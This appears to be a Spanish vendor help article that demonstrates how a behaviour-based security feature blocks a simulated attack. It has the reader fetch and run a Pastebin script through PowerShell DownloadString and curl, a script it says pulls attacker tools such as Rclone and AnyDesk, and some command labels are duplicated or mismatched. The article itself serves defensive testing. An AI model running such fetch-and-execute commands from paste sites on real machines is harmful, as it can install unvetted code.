La Prevención Dinámica es un motor de detección de seguridad basado en comportamiento que aplica controles dinámicos proactivamente en respuesta a amenazas detectadas para reducir la superficie de ataque y mitigar amenazas tempranamente, antes de que ocurra cualquier impacto. Para más información, consulte ¿Qué es la Prevención Dinámica?
Este artículo simula un escenario de ataque del mundo real para demostrar cómo la Prevención Dinámica protege su Red. En este ejemplo, un usuario descarga un script de Pastebin que un atacante usa para intentar recuperar herramientas adicionales de alto riesgo necesarias para llevar a cabo un ataque futuro. La Prevención Dinámica identifica el comportamiento malicioso y bloquea la herramienta para que no sea descargada, previniendo el ataque antes de que pueda progresar o ocurra cualquier impacto.
La respuesta a este ataque está completamente automatizada. No se requieren reglas adicionales. Simplemente habilitar la Prevención Dinámica es suficiente para prevenir el ataque.
Para simular este ataque:
- Descargar una herramienta de alto riesgo sin ser bloqueado
- Descargar el script desde Pastebin
- Intentar descargar las herramientas de alto riesgo nuevamente. Esta vez, la descarga está bloqueada.
Para demostrar que la Prevención Dinámica bloquea las acciones solo cuando forman parte de una secuencia maliciosa, primero descargue Rclone, una herramienta de línea de comandos de código abierto para gestionar archivos. Los atacantes comúnmente utilizan Rclone como una herramienta posterior al compromiso porque es legítima, poderosa y se mezcla con la actividad administrativa normal.
Descargar Rclone desde cualquiera de las siguientes opciones:
- La siguiente URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
En dispositivos Windows:
- El siguiente comando de PowerShell:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- El siguiente comando de PowerShell:
-
En dispositivos macOS/Linux:
- El siguiente comando de Terminal:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- El siguiente comando de Terminal:
Para simular el inicio de un ataque, descargue un script de Pastebin que, cuando se ejecuta, descarga herramientas comunes de atacantes, por ejemplo, Rclone y AnyDesk para acceso remoto y exfiltración.
Descargar y ejecutar el script desde Pastebin:
-
En dispositivos Windows:
- El siguiente comando de PowerShell:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
- El siguiente comando de PowerShell:
-
En dispositivos macOS/Linux:
- El siguiente comando de Terminal:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
- El siguiente comando de Terminal:
El script se ejecuta y descarga las herramientas. Se aplica un control dinámico al host, lo cual se muestra en el Panel de Amenazas de Seguridad en el widget Host con Controles. Para más información, consulte Usando el Panel de Amenazas de Seguridad.
En el ataque simulado, el atacante intenta descargar Rclone. Sin embargo, debido a que esta acción sigue a la actividad sospechosa de descargar el script desde Pastebin y se aplica un control, la Prevención Dinámica bloquea la descarga de Rclone.
Descargar Rclone desde cualquiera de las siguientes opciones:
- La siguiente URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
En dispositivos Windows:
- El siguiente comando de PowerShell:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- El siguiente comando de PowerShell:
-
En dispositivos macOS/Linux:
- El siguiente comando de Terminal:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- El siguiente comando de Terminal:
La descarga de este archivo está bloqueada por el control. La amenaza mitigada se muestra en el Panel de Amenazas de Seguridad en el widget Host con Amenazas Mitigadas.
0 comentarios
El artículo está cerrado para comentarios.